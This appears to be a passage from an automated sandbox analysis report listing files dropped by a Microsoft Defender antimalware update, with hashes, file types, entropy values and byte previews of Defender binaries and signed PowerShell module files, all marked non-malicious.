SSDEEP:	24576:Ghj1QlBYDgtUUvie3n+pB3+ojRlcD1VyZTFXk:GhpQlBHtBYla1VyZpU
MD5:	01F92DC7A766FF783AE7AF40FD0334FB
SHA1:	45D7B8E98E22F939ED0083FE31204CAA9A72FA76
SHA-256:	FA42B9B84754E2E8368E8929FA045BE86DBD72678176EE75814D2A16D23E5C26
SHA-512:	BEA5F3D7FB0984C4A71720F25644CE3151FCDC95586E1E2FFE804D04567AAF30D8678608110E241C7DDF908F94882EDDD84A994573B0C808D1C064F0E135A583
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B..#...#...#..EV...#...Q...#...Q...#...Q...#...Q...#...#..."..EV..#..EVN..#..EV...#..Rich.#..........PE..d.....P.........."......`....................@.............................0.......-....`.......... .......................................t..d....... ........D... ..h!... ......d...p.......................(......8...........0................................text...2R.......`.................. ..`.rdata.......p... ...p..............@..@.data..../....... ..................@....pdata...D.......P..................@..@.rsrc... ...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpSvc.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3113208
Entropy (8bit):	6.304406527619417
Encrypted:	false
SSDEEP:	49152:RThS41BElO7Jyf4HtxHnXXnh/vz1ztLm0exGP9lbw6ieBh4wBg:nR/EE7ofGx1fFxg
MD5:	0618D6AA4B96E666F1C3B79CA1531187
SHA1:	037AA87516FA27ADAE6499FFE314601262FE8E8A
SHA-256:	89FD82BABFEE76643CA0F3DC4730302575E2BCCB00F744090D9E253A8CD9EE53
SHA-512:	457ECDAF9CC2AB3E6E26F8899831979AC5B1D0D59483CFC30A815280CD362173E0E349F5CC28F45DE25E2AB9DF4731768CF06A0C8E66E595847A67A43833F481
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........!.\Z@..Z@..Z@...5..X@...5..[@...2..H@...2..H@...2..S@..S8*.M@..Z@...B...2..j@...2D.X@...5..[@...5..?A..}...]@...5F.[@...5..[@..RichZ@..........................PE..d................." ......"....................\............................../......;0...`A.........................................B,.d....C,.h.......`....p-.d1...`/.. ...P/.h4.../(.p.....................#.(.....".8.............#......;,.@....................text....q"......."................. ..`.rdata........".......".............@..@.data.........,.......,.............@....pdata..d1...p-..@...@-.............@..@.didat..............................@....rsrc...`...........................@..@.reloc..h4...P/..@... /.............@..B........................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpUpdate.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	151800
Entropy (8bit):	5.674686738982597
Encrypted:	false
SSDEEP:	1536:LJ9Z2WHykjzKo81vmwUGKyBA3LTqjSL0fieoeKTePoWQbzkDHP+W:LJ9b3Kd1vm/GymuL0fieoeKTePovbzsT
MD5:	BA4E1FC83B68F72927F58BBFA064C294
SHA1:	F0F57EB79F2478D7BFE4AD4D18361D2F09E3E03A
SHA-256:	23C224794D0342F3C97D6F104B40465A8C314186DD3A9F0CBBC9A9441700AE83
SHA-512:	789D52FF5491488B162422BFB4A6D4FB9D40E905B6A370AD2A9F20BA095B9485D5AF07EB8CD660D2BF4F4906DC1FA68ACD223ACFE913FC5F99F78FBDA56DDCA4
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ew9{!.W(!.W(!.W(.cT) .W(.cV)#.W(.dV)0.W(.dS),.W(.dT)&.W((n.(/.W(!.V(q.W(.dR)..W(.cW) .W(.c^)n.W(.c.( .W(.cU) .W(Rich!.W(........................PE..d.... 3".........." ..... .....................h.............................@............`A............................................L...\........ ...............0... ...0......@...p...................xU..(...@T..8............U...............................text............ .................. ..`.rdata..D....0.......0..............@..@.data... ...........................@....pdata........... ..................@..@.rsrc........ ......................@..@.reloc.......0....... ..............@..B................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpUxAgent.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	545016
Entropy (8bit):	5.974310663865527
Encrypted:	false
SSDEEP:	6144:j/zDRgR8KZHQf7uiJRpqVCy6H5gAH2IGCXl/2UWYbyKHiTVVmVVV8VVNVVVcVVVB:7zDRvDp/qVC1gAH2IGCXlPh4S
MD5:	68228D20DFAA033D246B8BED272CF92C
SHA1:	F351C4991FFC3190131B279E06A0F58856EBC375
SHA-256:	C44F961691C4F91AD370985D5EB281F843EB5DCF6F5EC98D9C9A509E789CB7E8
SHA-512:	2B327EB01858A1B7C80275B9F5B3B642592DFE0AD357B3C65D7C483D0CB59178CB33A245408BC0A962F28594B504C0F17521F567A8AD5CA981A770CC9B857916
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>7._Y.._Y.._Y..Z.._Y..X.._Y.Y-X.._Y.Y-].._Y.Y-Z.._Y..'.._Y.._X..^Y.Y-\.._Y.Y-..._Y..Y.._Y..P.._Y....._Y..[.._Y.Rich._Y.........PE..d.....2.........." .................&.......................................0......;......A................................................8........0..\........#...0... ... ...... ..p...................X...(... ...8...............x............................text...%........................... ..`.rdata..x........ ..................@..@.data....-.......0..................@....pdata...#.......0..................@..@.rsrc...\....0.......0..............@..@.reloc....... ....... ..............@..B........................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MsMpEng.exe Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	128392
Entropy (8bit):	5.775533067291842
Encrypted:	false
SSDEEP:	3072:gPkBbbztTh/9kcexTIJO0gj7KTe9q7CTttUSkh6e5:gPIfRh/9kUJDZuttUNse
MD5:	15D205854CA62B75C0BF447F9DD8119D
SHA1:	F1A1874738E310CE76D37C1045EA00C0CEFCF64B
SHA-256:	B815A94D49CC0E8DB03456CBBAFB4A052F481531F8768CE704A2A012FD84B7AB
SHA-512:	A6B324F884525875849994EE2247B98BF3D389A49B4E387A578F05E92FB754CEF6AD917D5CE201A40E88FDAA0A117C6D23EB5B7FEA6F4765F48EE957AB471B85
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-.U.L...L...L..W9...L...>...L...>...L...4...L...>...L...>...L...L...M..W9...L..W9y..L..W9...L..Rich.L..........PE..d....MCD.........."...........................@.....................................N......................................................tj..................\|........%......`....<..p....................$..(...."..8...........@$...............................text...B........................... ..`.rdata...Y... ...`... ..............@..@.data...............................@....pdata..\|........ ..................@..@.rsrc...............................@..@.reloc..`...........................@..B................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MsMpLics.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20728
Entropy (8bit):	4.482228069977977
Encrypted:	false
SSDEEP:	192:7rPEnfKWgFHWaALc2Fu462TNOxjB1RDBQABJpI4BOk9qnajR5d:7rPEniWgFHWa1MJERDBRJpxBhl95
MD5:	7B842DAC975E04C90F9B23B7D04B5160
SHA1:	DE370B7FBC16E36955A700D472BAD83A029F2B52
SHA-256:	61D412008B89D3B931BC9E8AD731F792DD9EF2D2F147916103B8F9392CF8D501
SHA-512:	7D7891BC65B67D9FB9CBA00953A3B86FEFD987EAE2718C79C36B17E1DDAC054A40E3DDE7AF662C8126C2B8440F172C7DF01C24469A8C0D57BD719255BD432F72
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..d....I?.........." ......... ...............................................0......P.....`A......................................................... ...............0... ..............T............................................................................rdata..............................@..@.rsrc........ ....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\NisSrv.exe Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2855512
Entropy (8bit):	6.440503543687848
Encrypted:	false
SSDEEP:	49152:JwgA1BydF9JuPAdoZ6Ig1hUcN2DARtfp+Q4s+W8:JqTi7cW
MD5:	054F919445EDBC999989A1413FD87437
SHA1:	597196C3A4C1CDC1DB5F1A0C39C37CB6C4FC1FB1
SHA-256:	A124EBD9240AAA542962CB2A1059B6315E9F2183CBFD08B4E8029EE15B6A009F
SHA-512:	38C530ABE67F12EEE0A6734CE51FCC24C0CD81AAFD232137A41E221B79FEE9BA07253DA7F50EBEE0E9BFF0FEBCC547C1CCFAE4AE7B222A13B8DC9A3097E2ED50
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h.C............C\|......C\|.......{.......{.......{.......q;..............{.......{U.............C\|..i...C\|W.....C\|......Rich............................PE..d....\k..........."......0#..........]!........@............................. ,.......+...`...................................................(.,.....+.H....`..P....+.X.....+..0.. .$.p...................h.#.(...0.#.8.............#.0....\|(......................text...?'#......0#................. ..`.rdata...i...@#..p...@#.............@..@.data...@.....(.......(.............@....pdata...P...`..`...P).............@..@.didat........+....................@....rsrc...H.....+....................@..@.reloc...0....+..@....*.............@..B................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Powershell\Defender.psd1 Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	13827
Entropy (8bit):	5.952601509916055
Encrypted:	false
SSDEEP:	384:6B7YQ0ExG5Ju4mSFCsCow7+xPcgGywK85lbkn+uwgGhF887:4YQ0Ec5Ju4mweozx0gGyu5Sn+uDuF8c
MD5:	9346D71D826DC7B6580C6206FD1A272E
SHA1:	21B45677AE39E36928CC1DE58958350CF7B49FE7
SHA-256:	EE3344F2D9FE64E0593B1DCE5FC4743D4891DAA6528A0650C41ED0D3F455D48E
SHA-512:	FD976F99CF3B47D6D9E17CEEBF5322C2F9583FA0F9D65E3C6D5144926911861DA3B4E57BD4E72CF3DBF7826BE5B5EF107BAEEB0C1DDF433BE4020B91D03467C9
Malicious:	false
Reputation:	unknown
Preview:	@{.. GUID = 'C46BE3DC-30A9-452F-A5FD-4BF9CA87A854'.. Author="Microsoft Corporation".. CompanyName="Microsoft Corporation".. Copyright="Copyright (C) Microsoft Corporation. All rights reserved.".. ModuleVersion = '1.0'.. NestedModules = @( 'MSFT_MpComputerStatus.cdxml',.. 'MSFT_MpPreference.cdxml',.. 'MSFT_MpThreat.cdxml',.. 'MSFT_MpThreatCatalog.cdxml',.. 'MSFT_MpThreatDetection.cdxml',.. 'MSFT_MpScan.cdxml',.. 'MSFT_MpSignature.cdxml',.. 'MSFT_MpWDOScan.cdxml',.. 'MSFT_MpPerformanceRecording.psm1'.. ).... FormatsToProcess = @('MSFT_MpPerformanceReport.Format.ps1xml').... FunctionsToExport = @( 'Get-MpPreference',.. 'Set-MpPreference',.. 'Add-MpPreference',.. 'Remove-MpPreference',..

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Powershell\MSFT_MpComputerStatus.cdxml Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	13946
Entropy (8bit):	5.978353470104296
Encrypted:	false
SSDEEP:	384:PX0m6YBOzHQV80tQEFMxOQhCLyTmSKXElIOhalPvnAQEYhW:v0m6YQzHY80tQpOQYLy6SKkIZFvnAQhU
MD5:	58DF8D38469AF7353B672A6F145994DC
SHA1:	DDC641F88A0B3452366CB920306CC3A90961A3C0
SHA-256:	A63B944CF4FB3DB7F758F7E4D94126ABE99916127E451E0C139D71E94744084A
SHA-512:	67B82A79DB97641976C942C448DF9D99317FF5CDC0BE3A1DB1CCA04C3BB8CE3832238E031D22E06CAE4E8ADD3BAB88CEEE29613680C8F33F197599D786334295
Malicious:	false
Reputation:	unknown
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<PowerShellMetadata xmlns="http://schemas.microsoft.com/cmdlets-over-objects/2009/11">.. <Class ClassName="ROOT\Microsoft\Windows\Defender\MSFT_MpComputerStatus">.. <Version>1.0</Version>.. <DefaultNoun>MpComputerStatus</DefaultNoun>.... <InstanceCmdlets>.. <GetCmdletParameters DefaultCmdletParameterSet="DefaultSet">.. .. </GetCmdletParameters>.. </InstanceCmdlets> .. </Class>.. ..</PowerShellMetadata>........ SIG # Begin signature block -->.. MIIhZwYJKoZIhvcNAQcCoIIhWDCCIVQCAQExDzANBglghkgBZQMEAgEFADB5Bgor -->.. BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG -->.. KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCCCGKubREngV5EF -->.. DodK5brTAqlkaVHav/M+SkqGWqFKKqCCC14wggTrMIID06ADAgECAhMzAAAIMJFU -->.. sm0DDuykAAAAAAgwMA0GCSqGSIb3DQEBCwUAMHkxCzAJBgNVBAYTAlVTMRMwEQYD -->.. VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy -->.. b3NvZnQgQ29y

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Powershell\MSFT_MpPerformanceRecording.psm1 Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	39934
Entropy (8bit):	5.64362105596826
Encrypted:	false
SSDEEP:	768:yFAwQAuFiCFivo1BWMmr8OGPDKQxV3LqIYQ0Ec5Ju4mweS0+dgGyTi5Sn+UuHA:y14cC4vo1BWMmr8OGPDKQxV3LqY/fSKR
MD5:	CBA32A98D0EC2D6CCCD3306BFF7AD3D2
SHA1:	D8F98682DC20E7AD744DE5208C0A472FCB3A33C9
SHA-256:	B77C1F9B9263345F34FE32EED15BD8E3925D378CAEF5D83FEB49275447BCCED6
SHA-512:	9426238394A6043D1A16E1CDEDA953DBD5C6DF8C7D2DBA3A3F34C3E5F963927A1C9791869E4ACE96F670921827E95D9BAF30544D558C521BD01C0E5AC7CB6F61
Malicious:	false
Reputation:	unknown
Preview:	## Copyright (c) Microsoft Corporation. All rights reserved.....<#...SYNOPSIS..This cmdlet collects a performance recording of Microsoft Defender Antivirus..scans......DESCRIPTION..This cmdlet collects a performance recording of Microsoft Defender Antivirus..scans. These performance recordings contain Microsoft-Antimalware-Engine..and NT kernel process events and can be analyzed after collection using the..Get-MpPerformanceReport cmdlet.....This cmdlet requires elevated administrator privileges.....The performance analyzer provides insight into problematic files that could..cause performance degradation of Microsoft Defender Antivirus. This tool is..provided "AS IS", and is not intended to provide suggestions on exclusions...Exclusions can reduce the level of protection on your endpoints. Exclusions,..if any, should be defined with caution......EXAMPLE..New-MpPerformanceRecording -RecordTo:.\Defender-scans.etl....#>..function New-MpPerformanceRecording {.. [CmdletBinding()].. par

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Powershell\MSFT_MpPerformanceRecording.wprp Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text
Category:	modified
Size (bytes):	4971
Entropy (8bit):	4.542570045638256
Encrypted:	false
SSDEEP:	96:aAPEP3EPGEPJuDhDEMTRBTCq6IQEPvAwWSJNLKI+EPZMhkvyXHkJi2eEPZMUkvy/:aAcPUPpPJfMTRBTr6ILPvAwW6NRPZMh2
MD5:	990729AD92C1325C42B04BC975ECBD57
SHA1:	1CDBE901753CCE8D933DF8D50507CE16A25AA428
SHA-256:	E796454FEE4CF17EFDC25DB5FEEF00A5D7C1B335E6C4B4FE996E8AD7CAB01BC8
SHA-512:	EA0BCD6122068DA9412E5195C7AA3017C187790C790197AC5AF129F3ACF6C23780169C0165627E5C55CB3B99E6931CB18A42E61701C647FF07EAF6DA2740DAEB
Malicious:	false
Reputation:	unknown
Preview:	.<?xml version="1.0" encoding="utf-8" standalone='yes'?>..<WindowsPerformanceRecorder Version="1.0" Author="Microsoft Defender for Endpoint" Team="Microsoft Defender for Endpoint" Comments="Microsoft Defender for Endpoint Scan performance tracing" Company="Microsoft Corporation" Copyright="Microsoft Corporation">. <Profiles>. System Providers -->.. <SystemProvider Id="SystemProvider_Scans_Light">. <Keywords>. <Keyword Value="CpuConfig" />. <Keyword Value="ProcessThread" />. <Keyword Value="ProcessCounter" />. </Keywords>. </SystemProvider>.. <SystemProvider Id="SystemProvider_Scans_Verbose" Base="SystemProvider_Scans_Light">. <Keywords Operation="Add">. <Keyword Value="Loader" />. <Keyword Value="SampledProfile"/>. </Keywords>. <Stacks>. <Stack Value="SampledProfile"/>. </Stacks>. </Syste

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Powershell\MSFT_MpPerformanceReport.Format.ps1xml Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	61966
Entropy (8bit):	4.530280013007693
Encrypted:	false
SSDEEP:	768:Bw2C10m6YQzHY80tQcd02cYVWVc80Bv/C:Bw2CTVtZk
MD5:	C9734A297293CCE204D369DD392EDDC9
SHA1:	83C091027F5BE029364DBB6C9D32BB294BC6579A
SHA-256:	CDF89F9602942969AE0493769EAC7DAA8022A1E8295D49403F1206615F92071A
SHA-512:	C474FB8F33E56DE45CB481CF921C9C21019F7610A35405BF16736A8A9C51901E750427E73271580FD1D169271DEB24A4BF1DFF130B76F26870EB4A5BE6201A7F
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="utf-8"?>..<Configuration>.. <ViewDefinitions>.. <View>.. <Name>default</Name>.. <ViewSelectedBy>.. <TypeName>MpPerformanceReport.Result</TypeName>.. <TypeName>Deserialized.MpPerformanceReport.Result</TypeName>.. </ViewSelectedBy>.. <CustomControl>.. <CustomEntries>.. <CustomEntry>.. <CustomItem>.. <ExpressionBinding>.. <PropertyName>TopFiles</PropertyName>.. <ItemSelectionCondition>.. <ScriptBlock>($_ \| gm -Name:'TopFiles' -MemberType:NoteProperty).Count -gt 0</ScriptBlock>.. </ItemSelectionCondition>.. <CustomControl>.. <CustomEntries>.. <CustomEntry>.. <CustomItem>.. <NewLine />.. <Text>TopFiles</Text>.. <NewLine />.. <Text>========</Text>..

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Powershell\MSFT_MpPreference.cdxml Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	112029
Entropy (8bit):	4.059259917659887
Encrypted:	false
SSDEEP:	768:5ouSOD2TIBNoNejxo98U0m6YQzHY80tQ4TQWjL+6SNSIZFvnAStOp:5pSODnBNUejx3mVt1LBuA7
MD5:	710B025F9E1944FDB020F27389A2E8B3
SHA1:	C8CB55361A6F483CD6B464C5364ED091AFE46DD3
SHA-256:	AA9021CFDC42493E2A759BAD0159001FFB12110FF83CD16021E57570E6402805
SHA-512:	C01AD9EB3B6394192E69F3C14A9BB5B266F04213B687D754E41D8DA080F2BFD3333ED970A4EBC04E0B657ECF7DBA8D7C44F2AC99857DA5A0A25E05FE3A79329E
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="utf-8"?>..<PowerShellMetadata xmlns="http://schemas.microsoft.com/cmdlets-over-objects/2009/11">.. <Class ClassName="root\Microsoft\Windows\Defender\MSFT_MpPreference" ClassVersion="1.0">.. <Version>1.0</Version>.. <DefaultNoun>MpPreference</DefaultNoun>.. <InstanceCmdlets>.. <GetCmdletParameters DefaultCmdletParameterSet="DefaultSet">.. </GetCmdletParameters>.. </InstanceCmdlets>.... <StaticCmdlets>.. <Cmdlet>.. <CmdletMetadata Verb="Set" />.. <Method MethodName="Set">.. <ReturnValue>.. <Type PSType="System.Int32" />.. <CmdletOutputMetadata>.. <ErrorCode />.. </CmdletOutputMetadata>.. </ReturnValue>.. <Parameters>.. <Parameter ParameterName="ExclusionPath">..

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Powershell\MSFT_MpScan.cdxml Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	15262
Entropy (8bit):	5.965807864910325
Encrypted:	false
SSDEEP:	384:7DORD5N4I0m6YBOzHQV80tQEFl3uN+HzbycVZ1gX5BRpBbpm39B4:K0m6YQzHY80tQpNWfgBHBo39B4
MD5:	7528936578CAEAEFE7B398C8EF4E0A47
SHA1:	9BBABA934E9C442A4630233D3BE04A4D4333E352
SHA-256:	A51C86EFD506A132274C37E288B9B697BC865F14D6D6451DA7399C7B5F36751F
SHA-512:	13D7B389428D07A7D33CBC0276919A601C686CF4A0E99059AF1D81AC0784EE61DFC5354E80D3D6E2B6E801769968980B828ACC5DC1885E6CBE73A2941D3823AC
Malicious:	false
Reputation:	unknown
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<PowerShellMetadata xmlns="http://schemas.microsoft.com/cmdlets-over-objects/2009/11">.. <Class ClassName="ROOT\Microsoft\Windows\Defender\MSFT_MpScan" ClassVersion="1.0">.. <Version>1.0</Version>.. <DefaultNoun>MpScan</DefaultNoun>.. <StaticCmdlets>.. <Cmdlet>.. <CmdletMetadata Verb="Start" />.. <Method MethodName="Start">.. <ReturnValue>.. <Type PSType="System.Int32" />.. <CmdletOutputMetadata>.. <ErrorCode />.. </CmdletOutputMetadata>.. </ReturnValue>.. <Parameters>.. <Parameter ParameterName="ScanPath">.. <Type PSType="System.String" />.. <CmdletParameterMetadata>.. <ValidateNotNull />.. <ValidateNotNullOrEmpty />.. </CmdletParameterMetadata>.. </Parameter>.. <Parameter ParameterName="ScanType">.. <Type PSType="MpScan.ScanType

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Powershell\MSFT_MpSignature.cdxml Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	15262
Entropy (8bit):	5.966711820105084
Encrypted:	false
SSDEEP:	384:E6D5YR4l0m6YBOzHQV80tQEFekIqeYQXCSPmTmSI4ElIOhalPvnAS/M0b5hsPDG:B0m6YQzHY80tQjqeYQSSO6SmIZFvnASn
MD5:	A212A25B0FA39ACB5D3F02E1CC622730
SHA1:	77846568863D3AEF5453AEF81C4302DD3F7C87BB
SHA-256:	6A8DC2AA231D974A36E0EC86751139873226D6157232EDB63AFB2AEB110CD8F5
SHA-512:	EBE171D29147429ABD182BE10174FE498EECA6D91D8DB8D9A55511E37C6E42F797A1D80892D95A61A116BCFB73DB99CEB0CC2B3365F0506ABF555E6FE80B7503
Malicious:	false
Reputation:	unknown
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<PowerShellMetadata xmlns="http://schemas.microsoft.com/cmdlets-over-objects/2009/11">.. <Class ClassName="ROOT\Microsoft\Windows\Defender\MSFT_MpSignature" ClassVersion="1.0">.. <Version>1.0</Version>.. <DefaultNoun>MpSignature</DefaultNoun>.. <StaticCmdlets>.. <Cmdlet>.. <CmdletMetadata Verb="Update" />.. <Method MethodName="Update">.. <ReturnValue>.. <Type PSType="System.Int32" />.. <CmdletOutputMetadata>.. <ErrorCode />.. </CmdletOutputMetadata>.. </ReturnValue>.. <Parameters>.. <Parameter ParameterName="UpdateSource">.. <Type PSType="MpSignature.UpdateSource" />.. <CmdletParameterMetadata>.. <AllowEmptyString />.. <AllowNull />.. <ValidateNotNull />.. <ValidateNotNullOrEmpty />.. <ValidateSet>.. <AllowedValue>In

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Powershell\MSFT_MpThreat.cdxml Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	14872
Entropy (8bit):	5.9567543836192955
Encrypted:	false
SSDEEP:	384:T50m6YBOzHQV80tQEFlS+yB+HzbycVZ1gX5BRpBbpmUBv/:l0m6YQzHY80tQUaWfgBHBoUBv/
MD5:	CF0F8A1D51777BDD9D08FEB023A2162A
SHA1:	47066E1FEB3C61779CC76CB52BE02148FC149CDF
SHA-256:	CFFD2BA2255685803B32ADE8D2D238A07AAEB8071EA04BCBB75CE0EF61FE9AE7
SHA-512:	B49A361319B5EA816C1FABB831C6B43C761427D7913D18E2D94AB4FE181A89394B5ADE044C1E9672FAF7B4B15D73F305CB0A8CFD8965348AD292DFD2257D99A8
Malicious:	false
Reputation:	unknown
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<PowerShellMetadata xmlns="http://schemas.microsoft.com/cmdlets-over-objects/2009/11">.. <Class ClassName="ROOT\Microsoft\Windows\Defender\MSFT_MpThreat" ClassVersion="1.0">.. <Version>1.0</Version>.. <DefaultNoun>MpThreat</DefaultNoun>.. <InstanceCmdlets>.. <GetCmdletParameters DefaultCmdletParameterSet="DefaultSet">.. <QueryableProperties>.. <Property PropertyName="ThreatID">.. <Type PSType="int64" />.. <RegularQuery>.. <CmdletParameterMetadata IsMandatory="false" Aliases="ID".. CmdletParameterSets="ById" />.. </RegularQuery>.. </Property>.. </QueryableProperties>.. </GetCmdletParameters>.. </InstanceCmdlets>.. <StaticCmdlets>.. <Cmdlet>.. <CmdletMetadata Verb="Remov

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Powershell\MSFT_MpThreatCatalog.cdxml Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	14359
Entropy (8bit):	5.974349558252268
Encrypted:	false
SSDEEP:	384:K0m6YBOzHQV80tQEFtVSderomWQfUCzuMKqbeUs:K0m6YQzHY80tQaS6omlfUCqMKqVs
MD5:	125B977FF0EE6A36452A2B6FD5AE2316
SHA1:	0C76D5588B36B5A9BFA5F2E3DD64CEA80FB1930D
SHA-256:	7856F35EB7FB72BBF8CAAAC05FD99CEE139F694209BCFBCA41AEB4C3B4CD2413
SHA-512:	9B9E246807F2890B9530197C5EFC8B236C2E11D2B616BE3E6DC813E9F8984197759A77AC73B8D8AF5FF9C13CBB370980B6DDC768281C4E38FF51CACF0D2E2B27
Malicious:	false
Reputation:	unknown
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<PowerShellMetadata xmlns="http://schemas.microsoft.com/cmdlets-over-objects/2009/11">.. <Class ClassName="ROOT\Microsoft\Windows\Defender\MSFT_MpThreatCatalog" ClassVersion="1.0">.. <Version>1.0</Version>.. <DefaultNoun>MpThreatCatalog</DefaultNoun>.. <InstanceCmdlets>.. <GetCmdletParameters DefaultCmdletParameterSet="DefaultSet">.. <QueryableProperties>.. <Property PropertyName="ThreatID">.. <Type PSType="int64" />.. <RegularQuery>.. <CmdletParameterMetadata IsMandatory="false" Aliases="ID".. CmdletParameterSets="ById" />.. </RegularQuery>.. </Property>.. </QueryableProperties>.. </GetCmdletParameters>.. </InstanceCmdlets>.. </Class>..</PowerShellMetadata>.. SIG # Begin signature block -->.. MIIhXAYJKoZIhvcNAQcCoI

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Powershell\MSFT_MpThreatDetection.cdxml Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe
